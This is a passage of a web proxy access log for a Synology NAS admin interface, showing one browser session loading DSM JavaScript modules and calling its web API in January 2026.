Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/PermissionDialog.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 19733] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_fbext.js?v=3.2.1-23280&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1817] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.DisableAdmin" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/MailTaskTray.js?v=1.3.4-1404&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/CloudSync/dscs_package.js?v=2.7.2-2464&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 69138] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 51689] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCEVue.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 5714] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/smb-tab.js?v=4.15.9-0644&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 14997] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_selector.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6034] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-options-dialog.js?v=4.15.9-0644&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1350] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Share/CustomColumn.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 46368] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_wizard.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 41851] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/UploadMonitor.js?v=1.3.4-1404&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6258] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/core.js?v=3.2.1-23280&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 6932] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Upgrade" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/app_tray.js?v=3.2.1-23280&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2818] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 186] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 353] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/desktop_index_tray.js?v=3.2.1-23280&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2789] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/admin_center.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 423009] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Foto.UserInfo" [Client 84.1.26.27] [Length 276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/C2FS.js?v=1.3.2-1037&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 164398] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 28340] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 194] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 190] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3567] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:50:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 106] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:05 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:15 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:47 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:54 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:51:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/PkgMyDS.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 3437] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:01 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/PkgManApp.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 48026] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:07 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:07 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4325] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileSaver.min.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 1261] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileTask.js?v=1.3.4-1404&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 441] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCE.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 874] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/clipboard.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 2929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:12:52:10 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/QRCodeDialog.js?v=42962-s9&SynoToken=f2zDo5IEsPcHw" [Client 84.1.26.27] [Length 631] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 